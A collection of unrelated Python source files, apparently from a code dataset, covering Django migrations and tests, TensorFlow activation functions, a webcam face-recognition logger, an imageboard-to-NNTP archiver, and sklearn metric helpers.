    """Mark Category.description and Category.name as translatable."""
    fields = ('description', 'name',)
class EventTemplateTranslationOptions(TranslationOptions):
    """Mark EventTemplate.description and EventTemplate.name as translatable."""
    fields = ('description', 'name',)
# Register the translatable field sets with django-modeltranslation.
translator.register(Category, CategoryTranslationOptions)
translator.register(EventTemplate, EventTemplateTranslationOptions)
4998187 | <reponame>leonoravesterbacka/excursion<gh_stars>1-10
# test_initialize_excursion.py
import torch
import yaml
from excursion import init_gp, ExcursionSetEstimator
from excursion.utils import load_example
def test_init_excursion():
    """Smoke-test: GP and estimator construction succeeds for the toy examples."""
    device = torch.device("cpu")
    ninit = 1
    # FIX: close the spec file deterministically (the original leaked the
    # handle returned by open()).
    with open("testing/algorithm_specs.yaml", "r") as specs_file:
        algorithmopts = yaml.safe_load(specs_file)
    # three toy examples
    for example in ["1Dtoyanalysis", "2Dtoyanalysis", "3Dtoyanalysis"]:
        testcase = load_example(example)
        gp, likelihood = init_gp(testcase, algorithmopts, ninit, device)
        estimator = ExcursionSetEstimator(
            testcase, algorithmopts, gp, likelihood, device
        )
        # `x is not None` is the idiomatic (and equivalent) form of the
        # original `type(x) != type(None)` checks.
        assert estimator is not None
        assert estimator._X_grid is not None
        assert estimator._n_dims is not None
        assert estimator._acq_type is not None
| StarcoderdataPython |
3371858 | <gh_stars>10-100
'''
Problem Description
Given an integer array A of size N.
You can pick B elements from either left or right end of the array A to get maximum sum.
Find and return this maximum possible sum.
NOTE: Suppose B = 4 and array A contains 10 elements then
You can pick first four elements or can pick last four elements or can pick 1 from front and 3 from back etc .
you need to return the maximum possible sum of elements you can pick.
'''
class Solution:
    # @param A : list of integers
    # @param B : integer
    # @return an integer
    def solve(self, A, B):
        """Return the maximum sum of B elements taken from the two ends of A.

        Starts with the first B elements, then repeatedly trades the rightmost
        still-selected front element for the next element from the back,
        tracking the best running total. Runs in O(B) and, unlike the previous
        version (which called A.pop()), does not mutate the caller's list.
        """
        current = sum(A[:B])
        best = current
        for taken_from_back in range(1, B + 1):
            # Swap A[B - taken_from_back] out of the front picks and bring
            # A[-taken_from_back] into the back picks.
            current += A[-taken_from_back] - A[B - taken_from_back]
            best = max(best, current)
        return best
| StarcoderdataPython |
5052578 | <reponame>sedatozturke/swe-573-2020f
# Generated by Django 3.1.5 on 2021-01-12 16:43
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration (Django 3.1.5, see file header): drops the
    # 'annotations' and 'mentions' fields from the Subreddit model in the
    # 'explore' app. Do not edit by hand except to squash.
    dependencies = [
        ('explore', '0003_auto_20210112_1931'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='subreddit',
            name='annotations',
        ),
        migrations.RemoveField(
            model_name='subreddit',
            name='mentions',
        ),
    ]
| StarcoderdataPython |
6418929 | <filename>aago_ranking/games/migrations/0001_initial.py<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-06-18 00:53
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
    # Initial auto-generated migration (Django 1.9.6, see file header):
    # creates the Game and Player models, then adds the Game.white_player
    # foreign key to Player. Do not edit by hand except to squash.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Game',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('date', models.DateField(db_index=True)),
            ],
            options={
                'verbose_name': 'game',
                'verbose_name_plural': 'games',
            },
        ),
        migrations.CreateModel(
            name='Player',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
                ('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
                ('name', models.CharField(max_length=255)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.AddField(
            model_name='game',
            name='white_player',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='games.Player'),
        ),
    ]
| StarcoderdataPython |
3516530 | <gh_stars>10-100
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
# Copyright 2019 The BERT-QA Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gaussian error linear unit."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
def gelu(x):
    """Gaussian Error Linear Unit (tanh approximation).

    A smoother version of the RELU; original paper:
    https://arxiv.org/abs/1606.08415

    Args:
        x: float Tensor to perform activation.

    Returns:
        `x` with the GELU activation applied.
    """
    inner = math.sqrt(2 / math.pi) * (x + 0.044715 * tf.pow(x, 3))
    cdf = 0.5 * (1.0 + tf.tanh(inner))
    return x * cdf
"""Customized Swish activation."""
def simple_swish(features):
    """Swish activation (x * sigmoid(x)) with default-gradient semantics.

    Unlike tf.nn.swish, this implementation uses no custom gradient, so it
    can be exported in a SavedModel / TF-Hub module and fine-tuned.

    Args:
        features: A `Tensor` representing preactivation values.

    Returns:
        The activation value.
    """
    tensor = tf.convert_to_tensor(features)
    return tensor * tf.nn.sigmoid(tensor)
def hard_swish(features):
    """Piecewise-linear ("hard") swish: x * relu6(x + 3) / 6.

    Cheaper than the smooth swish and quantization-friendly for edge devices.

    Args:
        features: A `Tensor` representing preactivation values.

    Returns:
        The activation value.
    """
    tensor = tf.convert_to_tensor(features)
    return tensor * tf.nn.relu6(tensor + tf.constant(3.)) * (1. / 6.)
def identity(features):
    """Identity activation; useful as a quantization-friendly no-op.

    Args:
        features: A `Tensor` representing preactivation values.

    Returns:
        The (unchanged) activation value.
    """
    tensor = tf.convert_to_tensor(features)
    return tf.identity(tensor)
def test_save_known_data():
    # TODO: implement once the save path for known data is testable.
    # (Cleaned: the def line was fused with dataset-id junk.)
    pass
def test_save_unknown_data():
    # TODO: implement once the save path for unknown data is testable.
    pass
| StarcoderdataPython |
11362376 | #!/usr/bin/env python
from enum import Enum
class ServerType(Enum):
    """Kafka/Confluent-style server roles used to classify deployment nodes."""
    ZOOKEEPER = 1
    KAFKA = 2
    SCHEMA_REGISTRY = 3
    KAFKA_CONNECT = 4
    REPLICATOR = 5
    KAFKA_REST = 6
    KSQLDB = 7
    CONTROL_CENTER = 8
    ANY = 9  # presumably a wildcard matching any role -- confirm at call sites
    NONE = 10  # presumably a "no server" sentinel -- confirm at call sites
| StarcoderdataPython |
1709946 | # -*- coding: utf-8 -*-
"""
mslib.mscolab._tests.test_file_manager
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
tests for file_manager functionalities
This file is part of mss.
:copyright: Copyright 2020 <NAME>
:copyright: Copyright 2020-2021 by the mss team, see AUTHORS.
:license: APACHE-2.0, see LICENSE for details.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from flask_testing import TestCase
import os
import pytest
from mslib.mscolab.conf import mscolab_settings
from mslib.mscolab.models import Operation, db
from mslib.mscolab.server import APP
from mslib.mscolab.file_manager import FileManager
from mslib.mscolab.seed import add_user, get_user
from mslib.mscolab.mscolab import handle_db_reset
@pytest.mark.skipif(os.name == "nt",
reason="multiprocessing needs currently start_method fork")
class Test_FileManager(TestCase):
render_templates = False
    def create_app(self):
        """Build the Flask app used by flask_testing.TestCase.

        Points SQLAlchemy and the data/upload directories at the mscolab
        settings and enables TESTING mode. LIVESERVER_PORT = 0 presumably
        lets the live server pick a free port -- confirm with flask_testing.
        """
        app = APP
        app.config['SQLALCHEMY_DATABASE_URI'] = mscolab_settings.SQLALCHEMY_DB_URI
        app.config['MSCOLAB_DATA_DIR'] = mscolab_settings.MSCOLAB_DATA_DIR
        app.config['UPLOAD_FOLDER'] = mscolab_settings.UPLOAD_FOLDER
        app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
        app.config["TESTING"] = True
        app.config['LIVESERVER_TIMEOUT'] = 10
        app.config['LIVESERVER_PORT'] = 0
        return app
def setUp(self):
handle_db_reset()
db.init_app(self.app)
self.userdata = 'UV10@uv10', 'UV10', 'uv10'
self.anotheruserdata = 'UV20@uv20', 'UV20', 'uv20'
self.fm = FileManager(self.app.config["MSCOLAB_DATA_DIR"])
self.userdata = 'UV10@uv10', 'UV10', 'uv10'
assert add_user(self.userdata[0], self.userdata[1], self.userdata[2])
self.user = get_user(self.userdata[0])
assert self.user is not None
assert add_user(self.anotheruserdata[0], self.anotheruserdata[1], self.anotheruserdata[2])
self.anotheruser = get_user(self.anotheruserdata[0])
assert add_user('UV30@uv30', 'UV30', 'uv30')
self.vieweruser = get_user('UV30@uv30')
assert add_user('UV40@uv40', 'UV40', 'uv40')
self.collaboratoruser = get_user('UV40@uv40')
self._example_data()
def tearDown(self):
pass
def test_create_operation(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="famous")
assert operation.path == flight_path
assert self.fm.create_operation(flight_path, "something to know", self.user) is False
flight_path, operation = self._create_operation(flight_path="example_flight_path", content=self.content1)
assert operation.path == flight_path
def test_get_operation_details(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='operation2')
pd = self.fm.get_operation_details(operation.id, self.user)
assert pd['description'] == operation.description
assert pd['path'] == operation.path
assert pd['id'] == operation.id
def test_list_operations(self):
with self.app.test_client():
self.fm.create_operation("first", "info about first", self.user)
self.fm.create_operation("second", "info about second", self.user)
expected_result = [{'access_level': 'creator',
'category': 'default',
'description': 'info about first',
'op_id': 1,
'path': 'first'},
{'access_level': 'creator',
'category': 'default',
'description': 'info about second',
'op_id': 2,
'path': 'second'}]
assert self.fm.list_operations(self.user) == expected_result
def test_is_admin(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='third')
assert self.fm.is_admin(self.user.id, operation.id)
def test_is_collaborator(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='fourth')
assert self.anotheruser.id is not None
self.fm.add_bulk_permission(operation.id, self.user, [self.anotheruser.id], "collaborator")
assert self.fm.is_collaborator(self.anotheruser.id, operation.id)
def test_auth_type(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="aa")
assert self.fm.auth_type(self.user.id, operation.id) != "collaborator"
assert self.fm.auth_type(self.user.id, operation.id) == "creator"
def test_update_operation(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='operation3')
rename_to = "operation03"
self.fm.update_operation(operation.id, "path", rename_to, self.user)
ren_operation = Operation.query.filter_by(path=rename_to).first()
assert ren_operation.id == operation.id
assert ren_operation.path == rename_to
def test_delete_file(self):
# Todo rename "file" to operation
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='operation4')
assert self.fm.delete_file(operation.id, self.user)
assert Operation.query.filter_by(path=flight_path).first() is None
def test_get_authorized_users(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path='operation5')
assert self.fm.get_authorized_users(operation.id) == [{'access_level': 'creator',
'username': self.userdata[1]}]
def test_save_file(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation6", content=self.content1)
# nothing changed
assert self.fm.save_file(operation.id, self.content1, self.user) is False
assert self.fm.save_file(operation.id, self.content2, self.user)
def test_get_file(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation7")
assert self.fm.get_file(operation.id, self.user).startswith('<?xml version="1.0" encoding="utf-8"?>')
def test_get_all_changes(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation8")
assert self.fm.get_all_changes(operation.id, self.user) == []
assert self.fm.save_file(operation.id, self.content1, self.user)
assert self.fm.save_file(operation.id, self.content2, self.user)
changes = self.fm.get_all_changes(operation.id, self.user)
assert len(changes) == 2
def test_get_change_content(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation8")
assert self.fm.get_all_changes(operation.id, self.user) == []
assert self.fm.save_file(operation.id, self.content1, self.user)
assert self.fm.save_file(operation.id, self.content2, self.user)
all_changes = self.fm.get_all_changes(operation.id, self.user)
assert self.fm.get_change_content(all_changes[1]["id"]) == self.content1
def test_set_version_name(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation8")
assert self.fm.get_all_changes(operation.id, self.user) == []
assert self.fm.save_file(operation.id, self.content1, self.user)
assert self.fm.save_file(operation.id, self.content2, self.user)
all_changes = self.fm.get_all_changes(operation.id, self.user)
assert self.fm.set_version_name(all_changes[1]["id"], operation.id, self.user.id, "THIS")
def test_undo(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation8")
assert self.fm.get_all_changes(operation.id, self.user) == []
assert self.fm.save_file(operation.id, self.content1, self.user)
assert self.fm.save_file(operation.id, self.content2, self.user)
all_changes = self.fm.get_all_changes(operation.id, self.user)
assert self.fm.undo(all_changes[1]["id"], self.user)
def test_fetch_users_without_permission(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation9")
assert len(self.fm.fetch_users_without_permission(operation.id, self.user.id)) == 3
def test_fetch_users_with_permission(self):
with self.app.test_client():
flight_path, operation = self._create_operation(flight_path="operation9")
assert self.fm.fetch_users_with_permission(operation.id, self.user.id) == []
def test_import_permission(self):
with self.app.test_client():
flight_path10, operation10 = self._create_operation(flight_path="operation10")
flight_path11, operation11 = self._create_operation(flight_path="operation11")
flight_path12, operation12 = self._create_operation(flight_path="operation12", user=self.anotheruser)
flight_path13, operation13 = self._create_operation_with_users(flight_path="operation13")
flight_path14, operation14 = self._create_operation_with_users(flight_path="operation14")
flight_path15, operation15 = self._create_operation_with_opposite_permissions(flight_path="operation15")
# equal permissions, nothing to do
result = (False, None, 'Permissions are already given')
assert self.fm.import_permissions(operation10.id, operation11.id, self.user.id) == result
# no admin rights
result = (False, None, 'Not an admin of this operation')
assert self.fm.import_permissions(operation10.id, operation12.id, self.user.id) == result
# not a member
result = (False, None, 'Not a member of this operation')
assert self.fm.import_permissions(operation12.id, operation10.id, self.user.id) == result
# we add to op8 all users of op11
result = (True, {'add_users': [self.vieweruser.id, self.collaboratoruser.id],
'delete_users': [],
'modify_users': []}, 'success')
assert self.fm.import_permissions(operation13.id, operation10.id, self.user.id) == result
# we remove all users from op8 which are not in op9
result = (True, {'add_users': [],
'delete_users': [self.vieweruser.id, self.collaboratoruser.id],
'modify_users': []}, 'success')
assert self.fm.import_permissions(operation11.id, operation10.id, self.user.id) == result
# we modify access level
result = (True, {'add_users': [],
'delete_users': [],
'modify_users': [self.vieweruser.id, self.collaboratoruser.id]}, 'success')
assert self.fm.import_permissions(operation15.id, operation14.id, self.user.id) == result
def _example_data(self):
self.content1 = """\
<?xml version="1.0" encoding="utf-8"?>
<FlightTrack>
<Name>new flight track (1)</Name>
<ListOfWaypoints>
<Waypoint flightlevel="0.0" lat="55.15" location="B" lon="-23.74">
<Comments>Takeoff</Comments>
</Waypoint>
<Waypoint flightlevel="350" lat="42.99" location="A" lon="-12.1">
<Comments></Comments>
</Waypoint>
<Waypoint flightlevel="380.0" lat="52.785" location="Shannon" lon="-8.925">
<Comments>Dive</Comments>
</Waypoint>
<Waypoint flightlevel="400.0" lat="48.08" location="EDMO" lon="11.28">
<Comments></Comments>
</Waypoint>
<Waypoint flightlevel="0.0" lat="63.74" location="C" lon="1.73">
<Comments>Landing</Comments>
</Waypoint>
</ListOfWaypoints>
</FlightTrack>"""
self.content2 = """\
<?xml version="1.0" encoding="utf-8"?>
<FlightTrack>
<Name>new flight track (1)</Name>
<ListOfWaypoints>
<Waypoint flightlevel="0.0" lat="55.15" location="B" lon="-23.74">
<Comments>Takeoff</Comments>
</Waypoint>
<Waypoint flightlevel="350" lat="42.99" location="A" lon="-12.1">
<Comments></Comments>
</Waypoint>
</ListOfWaypoints>
</FlightTrack>"""
def _create_operation(self, flight_path="firstflight", user=None, content=None):
if user is None:
user = self.user
self.fm.create_operation(flight_path, f"info about {flight_path}", user, content=content)
operation = Operation.query.filter_by(path=flight_path).first()
return flight_path, operation
def _create_operation_with_users(self, flight_path="firstflight", user=None, content=None):
if user is None:
user = self.user
self.fm.create_operation(flight_path, f"info about {flight_path}", user, content=content)
operation = Operation.query.filter_by(path=flight_path).first()
self.fm.add_bulk_permission(operation.id, self.user, [self.vieweruser.id], "viewer")
self.fm.add_bulk_permission(operation.id, self.user, [self.collaboratoruser.id], "collaborator")
return flight_path, operation
def _create_operation_with_opposite_permissions(self, flight_path="firstflight", user=None, content=None):
if user is None:
user = self.user
self.fm.create_operation(flight_path, f"info about {flight_path}", user, content=content)
operation = Operation.query.filter_by(path=flight_path).first()
self.fm.add_bulk_permission(operation.id, self.user, [self.vieweruser.id], "collaborator")
self.fm.add_bulk_permission(operation.id, self.user, [self.collaboratoruser.id], "viewer")
return flight_path, operation
| StarcoderdataPython |
9780034 | <gh_stars>0
import cv2
import numpy as np
import sys
import requests
import os
import alerts
import datetime
import time
def captures(names):
    """
    Run the webcam face-recognition loop.

    names maps the recognizer's numeric label to a display name.  Recognized
    faces are logged (with a timestamp) to admin_files/logs.txt; after ~150
    consecutive unrecognized frames an alert is sent via alerts.alert using
    the number(s) read from admin_files/mobile_no.txt.  Press 'q' to quit.
    """
    # Read the alert contact data once; 'with' guarantees the handle closes.
    with open("admin_files/mobile_no.txt", "r") as contacts_file:
        data = contacts_file.read()
    recognizer = cv2.face.LBPHFaceRecognizer_create()
    recognizer.read('trainer.yml')
    cascadePath = 'haarcascade_frontalface_default.xml'
    faceCascade = cv2.CascadeClassifier(cascadePath)
    font = cv2.FONT_HERSHEY_SIMPLEX
    cam = cv2.VideoCapture(0)
    # Counters of consecutive recognized / unrecognized detections.
    valid = 0
    invalid = 0
    flag = 0
    # Keep the log open for the whole session; closed even on exceptions.
    with open("admin_files/logs.txt", "a+") as log_file:
        while flag == 0:
            ret, img = cam.read()
            img = cv2.flip(img, 1)
            gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
            faces = faceCascade.detectMultiScale(
                gray,
                scaleFactor=1.2,
                minNeighbors=3,
                minSize=(10, 10)
            )
            for (x, y, w, h) in faces:
                cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
                # Renamed from `id`, which shadowed the builtin.
                label_id, confidence = recognizer.predict(gray[y:y + h, x:x + w])
                text = ""
                if confidence < 50:
                    valid += 1
                    text = names[label_id]
                    if valid >= 60:
                        cv2.putText(img, str("Logged to system"), (x + 5, y - 5), font, 1, (255, 255, 255), 2)
                        cv2.putText(img, str("Paused for few minutes.."), (x + 5, y + 5 + 270), font, 1, (255, 255, 255), 2)
                        cv2.imshow('camera', img)
                        if cv2.waitKey(1) & 0xFF == ord('q'):
                            flag = 1
                            break
                        # Use a dedicated name for the timestamp; the original
                        # reused the face-coordinate variable `x` here.
                        stamp = datetime.datetime.now().strftime("%m/%d/%Y, %H:%M:%S")
                        msg = "\n " + text + " logged at " + stamp
                        log_file.write(msg)
                        valid = 0
                        invalid = 0
                        time.sleep(3)
                    else:
                        cv2.putText(img, str("Detected " + text), (x + 5, y - 5), font, 1, (255, 255, 255), 2)
                        cv2.imshow('camera', img)
                        if cv2.waitKey(1) & 0xFF == ord('q'):
                            flag = 1
                            break
                else:
                    invalid += 1
                    if invalid >= 150:
                        cv2.putText(img, str("Cannot detect the face system will be alerted.."), (x + 5, y - 5), font, 1, (255, 255, 255), 2)
                        cv2.imshow('camera', img)
                        if cv2.waitKey(1) & 0xFF == ord('q'):
                            flag = 1
                            break
                        alerts.alert(data)
                        invalid = 0
                        valid = 0
                    else:
                        cv2.putText(img, str("Detecting.."), (x + 5, y - 5), font, 1, (255, 255, 255), 2)
                        cv2.imshow('camera', img)
                        if cv2.waitKey(1) & 0xFF == ord('q'):
                            flag = 1
                            break
            cv2.imshow('camera', img)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    cam.release()
    cv2.destroyAllWindows()
| StarcoderdataPython |
4948845 | #!/usr/bin/env python3.4
import requests
from bs4 import BeautifulSoup as BS
import datetime
import io
import nntplib
import time
import urllib.parse
import base64
import random
class Article:
    """
    an nntp article

    Wraps one JSON post object from an 8ch board/thread dump and renders it
    as an NNTP article (plain text, or MIME multipart when it has attachments).
    """
    # RFC-822-style date format, always rendered as UTC (+0000).
    timeFormat = '%a, %d %b %Y %H:%M:%S +0000'

    def __init__(self, j, board, site):
        """
        construct article
        :param j: json object (one post; must contain at least 'no' and 'time')
        :param board: board short name, e.g. 'tech'
        :param site: source hostname, used in message IDs and group names
        """
        self.j = j
        self.board = board
        self.site = site
        self.messageID = self.genMessageID(j['no'])

    def formatDate(self):
        """Post timestamp formatted as an NNTP Date header value (UTC)."""
        return datetime.datetime.utcfromtimestamp(self.j['time']).strftime(self.timeFormat)

    def message(self):
        """Plain-text body extracted from the post's HTML, or None if empty.

        NOTE(review): assumes the 'com' key is present on every post — confirm.
        """
        m = ''
        # for each line
        for p in BS(self.j['com']).find_all('p'):
            # clean it
            m += p.text
            m += '\n'
        if len(m.rstrip('\n')) > 0:
            return m

    def subject(self):
        """Post subject, or None when the post has no subject."""
        if 'subject' in self.j:
            return self.j['subject']

    def name(self):
        """Poster display name."""
        return self.j['name']

    def group(self):
        """Newsgroup name derived from site and board."""
        return 'overchan.archive.{}.{}'.format(self.site, self.board)

    def genMessageID(self, no):
        """Deterministic message ID for post number ``no`` on this board/site."""
        return '<{}.{}@{}>'.format(self.board, no, self.site)

    def header(self):
        """Render the article headers (plus References/MIME headers as needed)."""
        hdr = ("Subject: {}\n"+\
               "From: {} <<EMAIL>>\n"+\
               "Date: {}\n"+\
               "Newsgroups: {}\n"+\
               "Message-ID: {}\n"+\
               "Path: {}\n").format(self.subject(), self.name(), self.formatDate(), self.group(), self.messageID, self.site)
        # resto > 0 means this post replies to thread OP `resto`.
        if self.j['resto'] > 0:
            hdr += "References: {}\n".format(self.genMessageID(self.j['resto']))
        if 'filename' in self.j:
            hdr += 'Mime-Version: 1.0\n'
            hdr += 'Content-Type: multipart/mixed; boundary="{}"\n'.format(self.boundary)
        else:
            hdr += 'Content-Type: text/plain; encoding="UTF-8"\n'
        return hdr

    def bodyPlain(self):
        """Headers + plain body, or None when the post has no text."""
        msg = self.message()
        if msg:
            return "{}\n{}".format(self.header(), msg)

    def getAttachmentPart(self, j):
        """Download one attachment and return it as a base64 MIME part ('' on failure)."""
        msg = ''
        mtype = 'image'
        if j['ext'] in ['.mp4', '.webm']:
            mtype = 'video'
        url = 'https://{}/{}/src/{}{}'.format(self.site, self.board, j['tim'], j['ext'])
        print ('obtain {}'.format(url))
        r = requests.get(url)
        if r.status_code == 200:
            msg += '--{}\n'.format(self.boundary)
            # Fix: strip the leading dot from the extension so the subtype is
            # e.g. "video/webm" rather than the malformed "video/.webm".
            msg += 'Content-Type: {}/{}\n'.format(mtype, j['ext'].lstrip('.'))
            msg += 'Content-Disposition: form-data; filename="{}{}"; name="import"\n'.format(j['filename'], j['ext'])
            msg += 'Content-Transfer-Encoding: base64\n'
            msg += '\n'
            msg += base64.b64encode(r.content).decode('ascii')
            msg += '\n'
        else:
            print ('failed to obtain attachment: {} != 200'.format(r.status_code))
        return msg

    def bodyMultipart(self):
        """Headers + multipart body carrying the text and every attachment."""
        self.boundary = '========{}'.format(random.randint(0, 10000000))
        msg = self.header() + '\n'
        msg += '--{}\n'.format(self.boundary)
        msg += 'Content-Type: text/plain; encoding=UTF-8\n'
        msg += '\n'
        msg += self.message() + '\n'
        msg += self.getAttachmentPart(self.j)
        if 'extra_files' in self.j:
            for j in self.j['extra_files']:
                msg += self.getAttachmentPart(j)
        msg += '\n--{}--\n'.format(self.boundary)
        return msg

    def body(self):
        """Full article text: multipart when attachments exist, else plain."""
        if 'filename' in self.j:
            return self.bodyMultipart()
        else:
            return self.bodyPlain()
class Poster:
    """Uploads archived articles to an NNTP server using IHAVE."""

    def __init__(self, host, port, user, passwd):
        self.host = host
        self.port = port
        self.user = user
        self.passwd = passwd

    def post(self, articles):
        """
        post 1 or more articles

        Accepts a single Article or any iterable of them; articles with an
        empty body are skipped, and per-article failures are reported but do
        not abort the batch.
        """
        if isinstance(articles, Article):
            return self.post([articles])
        conn = nntplib.NNTP(self.host, self.port, self.user, self.passwd)
        for article in articles:
            payload = article.body()
            if not payload:
                continue
            print("posting {}".format(article.messageID))
            try:
                conn.ihave(article.messageID, io.BytesIO(payload.encode('utf-8')))
            except Exception as e:
                print('failed: {}'.format(e))
        conn.quit()
def url_parse(url):
    """Split *url* into its components (thin alias for urllib.parse.urlparse)."""
    return urllib.parse.urlparse(url)
class Getter:
    """Fetches a board or thread JSON dump and yields its posts as Articles."""

    def __init__(self, url):
        self.url = url
        parsed = urllib.parse.urlparse(url)
        self.site = parsed.hostname
        # Path looks like /<board>/<page>.json, so element 1 is the board.
        self.board = parsed.path.split('/')[1]

    def get(self, thread=False):
        """
        yield a bunch of articles

        When ``thread`` is True the URL is expected to be a thread dump
        ('posts' key); otherwise a board page dump ('threads' key).
        Non-200 responses and invalid JSON yield nothing.
        """
        r = requests.get(self.url)
        if r.status_code == 200:
            try:
                j = r.json()
            # Fix: the original used a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; only JSON decode errors belong here.
            except ValueError:
                pass
            else:
                if thread:
                    if 'posts' in j:
                        for post in j['posts']:
                            yield Article(post, self.board, self.site)
                else:
                    if 'threads' in j:
                        for t in j['threads']:
                            posts = t['posts']
                            for post in posts:
                                yield Article(post, self.board, self.site)
def main():
    """CLI entry point: archive a single thread (--thread) or a whole board."""
    import argparse
    ap = argparse.ArgumentParser()
    ap.add_argument('--server', type=str, required=True)
    ap.add_argument('--port', type=int, required=True)
    ap.add_argument('--board', type=str, required=True)
    ap.add_argument('--thread', type=str, required=False)
    ap.add_argument('--user', type=str, required=True)
    # Fix: this was `requried=True`, an unknown keyword that makes argparse
    # raise TypeError before any arguments are parsed.
    ap.add_argument('--passwd', type=str, required=True)
    args = ap.parse_args()
    poster = Poster(args.server, args.port, args.user, args.passwd)
    if args.thread:
        # only archive 1 thread
        # Fix: the original interpolated the undefined name `thread`
        # (NameError); the parsed argument is args.thread.
        getter = Getter('https://8ch.net/{}/res/{}.json'.format(args.board, args.thread))
        poster.post(getter.get(thread=True))
    else:
        # archive the entire board
        for n in range(10):
            getter = Getter('https://8ch.net/{}/{}.json'.format(args.board, n))
            poster.post(getter.get())


if __name__ == "__main__":
    main()
| StarcoderdataPython |
1655973 | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 18 14:44:44 2021
@author: <NAME>
"""
from sklearn.metrics import explained_variance_score
from sklearn.metrics import r2_score
from sklearn.metrics import max_error
from sklearn.metrics import accuracy_score
from sklearn.metrics import roc_auc_score
from sklearn.metrics import balanced_accuracy_score
from sklearn.metrics import average_precision_score
from statsmodels.stats.outliers_influence import variance_inflation_factor
import numpy as np
import pandas as pd
import logging
class _Tool():
def KS(y_true,y_hat,sample_weight=None):
if isinstance(y_true,np.ndarray):
y_true=pd.Series(y_true)
if sample_weight is None:
sample_weight=pd.Series(np.ones_like(y_true),index=y_true.index)
if isinstance(y_hat,np.ndarray):
y_hat = pd.Series(y_hat,index=y_true.index)
sample_weight.name='sample_weight'
y_true.name='y'
y_hat.name='score'
df = pd.concat([y_hat,y_true,sample_weight],axis=1)
df['y_mutli_w']=df['y']*df['sample_weight']
total = df.groupby(['score'])['sample_weight'].sum()
bad = df.groupby(['score'])['y_mutli_w'].sum()
all_df = pd.DataFrame({'total':total, 'bad':bad})
all_df['good'] = all_df['total'] - all_df['bad']
all_df.reset_index(inplace=True)
all_df = all_df.sort_values(by='score',ascending=False)
all_df['badCumRate'] = all_df['bad'].cumsum() / all_df['bad'].sum()
all_df['goodCumRate'] = all_df['good'].cumsum() / all_df['good'].sum()
ks = all_df.apply(lambda x: x.goodCumRate - x.badCumRate, axis=1)
return np.abs(ks).max()
def vif(df):
vif = pd.DataFrame()
vif['features'] = df.columns
if df.shape[1]>1:
vif['VIF Factor'] = [variance_inflation_factor(df.values, i) for i in range(df.shape[1])]
else:
vif['VIF Factor']=0
vif = vif.sort_values('VIF Factor',ascending=False)
return vif
def make_logger(logger_name,logger_file):
logger = logging.getLogger(logger_name)
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler(logger_file,mode='w')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(name)s]-[%(filename)s-%(lineno)d]-[%(processName)s]-[%(asctime)s]-[%(levelname)s]: %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger,fh
# Registry mapping metric names to scorer callables: sklearn regression and
# classification metrics plus the custom weighted KS statistic on _Tool.
SCORERS = dict(
    r2=r2_score,
    explained_variance_score=explained_variance_score,
    max_error = max_error,
    accuracy=accuracy_score,
    roc_auc=roc_auc_score,
    balanced_accuracy=balanced_accuracy_score,
    average_precision=average_precision_score,
    ks=_Tool.KS)
1989862 | import os
import json
from collections import defaultdict
from bs4 import BeautifulSoup
# Scrape questions/answers out of four saved quiz pages and merge them into a
